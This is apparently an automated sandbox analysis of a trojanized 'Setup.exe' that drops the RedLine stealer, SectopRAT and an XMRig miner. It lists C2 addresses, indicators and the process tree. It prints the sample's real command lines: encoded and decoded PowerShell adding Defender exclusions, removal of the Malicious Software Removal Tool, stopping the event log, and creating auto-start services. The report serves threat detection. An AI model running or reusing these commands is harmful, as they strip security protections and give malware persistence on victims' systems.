Analysis
max time kernel: 149s
max time network: 138s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 30-06-2024 17:37

Static task: static1
Behavioral task: behavioral1
  Sample: Setup.exe
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: Setup.exe
  Resource: win10v2004-20240508-en
General
Target: Setup.exe
Size: 12.5MB
MD5: 3ba515e7df4c8918a967f4043cd8c72b
SHA1: 3659a765f502297fb92a9d14b08e5b8d91bc8603
SHA256: 5234a3b9c46390f23a13c401cd294dadc63944ed57a19b26ff4e7211442e0482
SHA512: 010d639a231724425e791afccc7fabacd9b20269665706434c28eba6192af5b424a792755ff1503c0e0afcdd05c5b470d59f57f706f843157c42212e0bb40d8c
SSDEEP: 393216:Y9XWBQ/bXZmSUGkVAqYwm9MlpcghwvWLT0Z:Y9GBmZkVAqYweMbIWfo
Malware Config
Extracted: redline
  Botnet: MergedALL
  C2: 51.195.206.227:38719
Extracted: redline
  Botnet: telegramone
  C2: 163.5.160.27:51523
Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine payload 4 IoCs
Processes:
resource | yara_rule
\Users\Admin\AppData\Local\Temp\mergedALL.exe | family_redline
C:\Users\Admin\AppData\Local\Temp\fix.exe | family_redline
behavioral1/memory/2632-56-0x0000000000F30000-0x0000000000F80000-memory.dmp | family_redline
behavioral1/memory/2396-57-0x0000000000310000-0x000000000032E000-memory.dmp | family_redline
SectopRAT payload 2 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\fix.exe | family_sectoprat
behavioral1/memory/2396-57-0x0000000000310000-0x000000000032E000-memory.dmp | family_sectoprat
XMRig Miner payload 9 IoCs
Processes:
resource | yara_rule
behavioral1/memory/1604-256-0x0000000140000000-0x0000000140848000-memory.dmp | xmrig
behavioral1/memory/1604-255-0x0000000140000000-0x0000000140848000-memory.dmp | xmrig
behavioral1/memory/1604-258-0x0000000140000000-0x0000000140848000-memory.dmp | xmrig
behavioral1/memory/1604-262-0x0000000140000000-0x0000000140848000-memory.dmp | xmrig
behavioral1/memory/1604-261-0x0000000140000000-0x0000000140848000-memory.dmp | xmrig
behavioral1/memory/1604-259-0x0000000140000000-0x0000000140848000-memory.dmp | xmrig
behavioral1/memory/1604-260-0x0000000140000000-0x0000000140848000-memory.dmp | xmrig
behavioral1/memory/1604-263-0x0000000140000000-0x0000000140848000-memory.dmp | xmrig
behavioral1/memory/1604-264-0x0000000140000000-0x0000000140848000-memory.dmp | xmrig
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
Processes:
pid | process
1556 | powershell.exe
2144 | powershell.exe
2548 | powershell.exe
584 | powershell.exe
1204 | powershell.exe
Creates new service(s) 2 TTPs
Executes dropped EXE 10 IoCs
Processes:
pid | process
3024 | hamburger.exe
2600 | Notepad.exe
2632 | mergedALL.exe
2104 | etc test.exe
2376 | Notepad.exe
2396 | fix.exe
1148 | (image name not recorded)
480 | (image name not recorded)
1912 | tubpxzvwmyfr.exe
532 | esfowblknspo.exe
Loads dropped DLL 13 IoCs
Processes:
pid | process
2240 | Setup.exe
2240 | Setup.exe
2240 | Setup.exe
2240 | Setup.exe
2240 | Setup.exe
2240 | Setup.exe
2600 | Notepad.exe
2240 | Setup.exe
2376 | Notepad.exe
1148 | (image name not recorded)
480 | (image name not recorded)
480 | (image name not recorded)
480 | (image name not recorded)
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Processes:
resource | yara_rule
behavioral1/memory/1604-251-0x0000000140000000-0x0000000140848000-memory.dmp | upx
behavioral1/memory/1604-256-0x0000000140000000-0x0000000140848000-memory.dmp | upx
behavioral1/memory/1604-255-0x0000000140000000-0x0000000140848000-memory.dmp | upx
behavioral1/memory/1604-253-0x0000000140000000-0x0000000140848000-memory.dmp | upx
behavioral1/memory/1604-252-0x0000000140000000-0x0000000140848000-memory.dmp | upx
behavioral1/memory/1604-254-0x0000000140000000-0x0000000140848000-memory.dmp | upx
behavioral1/memory/1604-250-0x0000000140000000-0x0000000140848000-memory.dmp | upx
behavioral1/memory/1604-258-0x0000000140000000-0x0000000140848000-memory.dmp | upx
behavioral1/memory/1604-262-0x0000000140000000-0x0000000140848000-memory.dmp | upx
behavioral1/memory/1604-261-0x0000000140000000-0x0000000140848000-memory.dmp | upx
behavioral1/memory/1604-259-0x0000000140000000-0x0000000140848000-memory.dmp | upx
behavioral1/memory/1604-260-0x0000000140000000-0x0000000140848000-memory.dmp | upx
behavioral1/memory/1604-263-0x0000000140000000-0x0000000140848000-memory.dmp | upx
behavioral1/memory/1604-264-0x0000000140000000-0x0000000140848000-memory.dmp | upx
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops file in System32 directory 8 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\system32\MRT.exe | hamburger.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\system32\MRT.exe | tubpxzvwmyfr.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\system32\MRT.exe | etc test.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\system32\MRT.exe | esfowblknspo.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
Suspicious use of SetThreadContext 3 IoCs
Processes:
description | pid | process | target process
PID 1912 set thread context of 2588 | 1912 | tubpxzvwmyfr.exe | conhost.exe
PID 1912 set thread context of 1604 | 1912 | tubpxzvwmyfr.exe | conhost.exe
PID 532 set thread context of 2248 | 532 | esfowblknspo.exe | conhost.exe
Drops file in Windows directory 4 IoCs
Processes:
description | ioc | process
File created | C:\Windows\wusa.lock | wusa.exe
File created | C:\Windows\wusa.lock | wusa.exe
File created | C:\Windows\wusa.lock | wusa.exe
File created | C:\Windows\wusa.lock | wusa.exe
Launches sc.exe 8 IoCs
sc.exe is a Windows utility to control services on the system.
Processes:
pid | process
2032 | sc.exe
2872 | sc.exe
268 | sc.exe
2148 | sc.exe
2812 | sc.exe
2796 | sc.exe
1840 | sc.exe
308 | sc.exe
Detects Pyinstaller 1 IoCs
Processes:
resource | yara_rule
\Users\Admin\AppData\Local\Temp\Notepad.exe | pyinstaller
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Modifies data under HKEY_USERS 2 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0268a2d14cbda01 | powershell.exe
Modifies system certificate store
Processes:
fix.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 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 fix.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 fix.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 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 fix.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57
b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 fix.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 
040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564b
f5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 fix.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 fix.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes (consecutive repeats of the same pid/process row are shown once with a count):
pid | process | count
1204 | powershell.exe | 1
2632 | mergedALL.exe | 1
2396 | fix.exe | 1
2632 | mergedALL.exe | 2
2396 | fix.exe | 1
3024 | hamburger.exe | 1
2104 | etc test.exe | 1
1556 | powershell.exe | 1
3024 | hamburger.exe | 5
1912 | tubpxzvwmyfr.exe | 1
2548 | powershell.exe | 1
1912 | tubpxzvwmyfr.exe | 3
1604 | conhost.exe | 5
2144 | powershell.exe | 1
2104 | etc test.exe | 5
532 | esfowblknspo.exe | 1
584 | powershell.exe | 1
532 | esfowblknspo.exe | 2
1604 | conhost.exe | 30
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 1204 | powershell.exe
Token: SeDebugPrivilege | 2396 | fix.exe
Token: SeDebugPrivilege | 2632 | mergedALL.exe
Token: SeDebugPrivilege | 1556 | powershell.exe
Token: SeDebugPrivilege | 2548 | powershell.exe
Token: SeLockMemoryPrivilege | 1604 | conhost.exe
Token: SeDebugPrivilege | 2144 | powershell.exe
Token: SeDebugPrivilege | 584 | powershell.exe
Suspicious use of WriteProcessMemory 62 IoCs
Processes (consecutive repeats of the same row are shown once with a count):
description | pid | process | target process | count
PID 2240 wrote to memory of 1204 | 2240 | Setup.exe | powershell.exe | 4
PID 2240 wrote to memory of 3024 | 2240 | Setup.exe | hamburger.exe | 4
PID 2240 wrote to memory of 2600 | 2240 | Setup.exe | Notepad.exe | 4
PID 2240 wrote to memory of 2632 | 2240 | Setup.exe | mergedALL.exe | 4
PID 2240 wrote to memory of 2104 | 2240 | Setup.exe | etc test.exe | 4
PID 2600 wrote to memory of 2376 | 2600 | Notepad.exe | Notepad.exe | 3
PID 2240 wrote to memory of 2396 | 2240 | Setup.exe | fix.exe | 4
PID 2524 wrote to memory of 2592 | 2524 | cmd.exe | wusa.exe | 3
PID 1912 wrote to memory of 2588 | 1912 | tubpxzvwmyfr.exe | conhost.exe | 10
PID 1912 wrote to memory of 1604 | 1912 | tubpxzvwmyfr.exe | conhost.exe | 2
PID 2320 wrote to memory of 768 | 2320 | cmd.exe | wusa.exe | 3
PID 1912 wrote to memory of 1604 | 1912 | tubpxzvwmyfr.exe | conhost.exe | 3
PID 2996 wrote to memory of 2888 | 2996 | cmd.exe | wusa.exe | 3
PID 532 wrote to memory of 2248 | 532 | esfowblknspo.exe | conhost.exe | 9
PID 1248 wrote to memory of 2256 | 1248 | cmd.exe | wusa.exe | 3
Processes
(Each entry gives the image path, then its command line; child processes are indented under their parent.)

C:\Users\Admin\AppData\Local\Temp\Setup.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAYgBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAegBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAagBuACMAPgA="
    Decoded -EncodedCommand (base64 of UTF-16LE): <#gqr#>Add-MpPreference <#sbm#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#hzb#> -Force <#djn#>
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Users\Admin\AppData\Local\Temp\hamburger.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\hamburger.exe"
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      - Command and Scripting Interpreter: PowerShell
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\wusa.exe
        Command line: wusa /uninstall /kb:890830 /quiet /norestart
        - Drops file in Windows directory
    C:\Windows\system32\sc.exe
      Command line: C:\Windows\system32\sc.exe delete "UPFRTHSI"
      - Launches sc.exe
    C:\Windows\system32\sc.exe
      Command line: C:\Windows\system32\sc.exe create "UPFRTHSI" binpath= "C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe" start= "auto"
      - Launches sc.exe
    C:\Windows\system32\sc.exe
      Command line: C:\Windows\system32\sc.exe stop eventlog
      - Launches sc.exe
    C:\Windows\system32\sc.exe
      Command line: C:\Windows\system32\sc.exe start "UPFRTHSI"
      - Launches sc.exe
  C:\Users\Admin\AppData\Local\Temp\Notepad.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Notepad.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Local\Temp\Notepad.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Notepad.exe"
      - Executes dropped EXE
      - Loads dropped DLL
  C:\Users\Admin\AppData\Local\Temp\mergedALL.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\mergedALL.exe"
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Users\Admin\AppData\Local\Temp\etc test.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\etc test.exe"
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      - Command and Scripting Interpreter: PowerShell
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\wusa.exe
        Command line: wusa /uninstall /kb:890830 /quiet /norestart
        - Drops file in Windows directory
    C:\Windows\system32\sc.exe
      Command line: C:\Windows\system32\sc.exe delete "OBKZWAPS"
      - Launches sc.exe
    C:\Windows\system32\sc.exe
      Command line: C:\Windows\system32\sc.exe create "OBKZWAPS" binpath= "C:\ProgramData\rstywrmdprzs\esfowblknspo.exe" start= "auto"
      - Launches sc.exe
    C:\Windows\system32\sc.exe
      Command line: C:\Windows\system32\sc.exe stop eventlog
      - Launches sc.exe
    C:\Windows\system32\sc.exe
      Command line: C:\Windows\system32\sc.exe start "OBKZWAPS"
      - Launches sc.exe
  C:\Users\Admin\AppData\Local\Temp\fix.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\fix.exe"
    - Executes dropped EXE
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe
  Command line: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\wusa.exe
      Command line: wusa /uninstall /kb:890830 /quiet /norestart
      - Drops file in Windows directory
  C:\Windows\system32\conhost.exe
    Command line: C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
    Command line: conhost.exe
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\ProgramData\rstywrmdprzs\esfowblknspo.exe
  Command line: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\wusa.exe
      Command line: wusa /uninstall /kb:890830 /quiet /norestart
      - Drops file in Windows directory
  C:\Windows\system32\conhost.exe
    Command line: C:\Windows\system32\conhost.exe
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
  Filesize: 70KB
  MD5: 49aebf8cbd62d92ac215b2923fb1b9f5
  SHA1: 1723be06719828dda65ad804298d0431f6aff976
  SHA256: b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
  SHA512: bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 342B
  MD5: 0ffe01bfe1fbb6c8466c776a982d99c4
  SHA1: 3fc80f6c48bc2d6b91b72c4ff4d1a5b04aa91caa
  SHA256: 2705615a4c94d5f9ccd5d7964c8f6df91bb18712334942d22cfecc8b88fe1a2f
  SHA512: 9422628443fdbbed63987ef552569cc3acde53edda87671f783ddc80bfe744ac52fd1b4f99c6736f21d2e62085aa8749e5eb6050099cd149e7488b56b1fd9318
- C:\Users\Admin\AppData\Local\Temp\Cab37B5.tmp
  Filesize: 65KB
  MD5: ac05d27423a85adc1622c714f2cb6184
  SHA1: b0fe2b1abddb97837ea0195be70ab2ff14d43198
  SHA256: c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
  SHA512: 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
- C:\Users\Admin\AppData\Local\Temp\Tar38B6.tmp
  Filesize: 181KB
  MD5: 4ea6026cf93ec6338144661bf1202cd1
  SHA1: a1dec9044f750ad887935a01430bf49322fbdcb7
  SHA256: 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
  SHA512: 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
- C:\Users\Admin\AppData\Local\Temp\_MEI26002\python312.dll
  Filesize: 6.7MB
  MD5: 550288a078dffc3430c08da888e70810
  SHA1: 01b1d31f37fb3fd81d893cc5e4a258e976f5884f
  SHA256: 789a42ac160cef98f8925cb347473eeeb4e70f5513242e7faba5139ba06edf2d
  SHA512: 7244432fc3716f7ef27630d4e8fbc8180a2542aa97a01d44dca260ab43966dd8ac98b6023400b0478a4809aace1a128f1f4d6e544f2e591a5b436fd4c8a9d723
- C:\Users\Admin\AppData\Local\Temp\etc test.exe
  Filesize: 2.5MB
  MD5: e4e8f85ee773cd79bd76dd7798baf957
  SHA1: 112f53467d2946f2bcf4c55bb4177f25120cda13
  SHA256: a0a9aa62080c1a543e11e5853fcd6964e598b59a0a7c24de7a7f1d951177e564
  SHA512: 99a1dd206181ef20c572a1a1ed9354cc2f70424a4493cd2e67648b54483f90e0bf291764e4731943c6ed73ab872b3fa8410c0368295d5a025330792a17f19dad
- C:\Users\Admin\AppData\Local\Temp\fix.exe
  Filesize: 95KB
  MD5: 1f327a277466f1bb04aa5cfcd279c0f7
  SHA1: 9bcb7bbac28992b9c7c35ba0573dce7db32ca18f
  SHA256: e8432406bc918c6ce0d245a3bc5bb8c021b218593f94b5d09ebcda7e549f1fc0
  SHA512: 82c750475dc42d974c3fd33a4329bce7e99a5c15bf88fe4e802627b321b6c91f78e8be4b82e72380ee34c4de407878d17b18af26d7f5667104fdc55020f68a9d
- C:\Users\Admin\AppData\Local\Temp\hamburger.exe
  Filesize: 2.5MB
  MD5: 09af9e57d30e6929c115811dfa9c3b7e
  SHA1: caf9281f7001f92524005c60a34f33543315df52
  SHA256: 3b031ddbb05570ca3ffefa93abbd1cb2891897a34ea9b4a29612858b66a146f2
  SHA512: 023849985162db69160f559002586dbdb4148747f13fa1ff617e75b0f972c778f9f3d6a033dd3fb429d78aa3c20b264d83dc44274d6c0743a3ed1cf88fb045f8
- C:\Users\Admin\AppData\Local\Temp\tmp400B.tmp
  Filesize: 46KB
  MD5: 02d2c46697e3714e49f46b680b9a6b83
  SHA1: 84f98b56d49f01e9b6b76a4e21accf64fd319140
  SHA256: 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
  SHA512: 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac
- C:\Users\Admin\AppData\Local\Temp\tmp4021.tmp
  Filesize: 92KB
  MD5: bbe71b58e84c50336ee2d3bad3609c39
  SHA1: bdd3227b48977e583127425cbc2f86ff4077ba10
  SHA256: b25b7e57924b2382d3178696782b51fa62b68fa7e763081d7a53471cccc1ff3c
  SHA512: 07fcac6778f114fb372dac7ed489624b8e0aed347bc14af77ec36b5201df8b3d99e2a69a384756606030bb146f5c0780f39a274dc5a4b4f6863746ec7fa2ca2a
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y0ANJLHUCMIHBTS2SKPD.temp
  Filesize: 7KB
  MD5: 37848454b3bb8d1b900c03c90694b897
  SHA1: a04057a76d236868ebabece8f4343e7f303ae15a
  SHA256: a757abc55cf2dbc5a06958659a4df21bb6684cc386d46c4eee0c3ca2732d50b4
  SHA512: 3e577854181bf04d09f792b39dafcf964e6deb15d065d4348058fe4e52e2e77535238fa0a56994c227193a65033f83e59b6a120476aa2946ed52826f421946c1
- \??\PIPE\srvsvc
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
- \Users\Admin\AppData\Local\Temp\Notepad.exe
  Filesize: 7.0MB
  MD5: 150f7378fd18d19ecc002761fa112de5
  SHA1: a5ef247183d14dcd0d9b112306c1965c38720a1e
  SHA256: b3bfd7d408a13096897fe8cbaff158cb8ff34f6d2d2269b25a1a268daeef387c
  SHA512: dd3739f3e7736c6d6319dbf71346addfdab60d668c84b91d9c87bdf5ee7c6ea085b49a314c52338cb196cceb212067fdbf804da91d9f517a34e1b0978ceebb6d
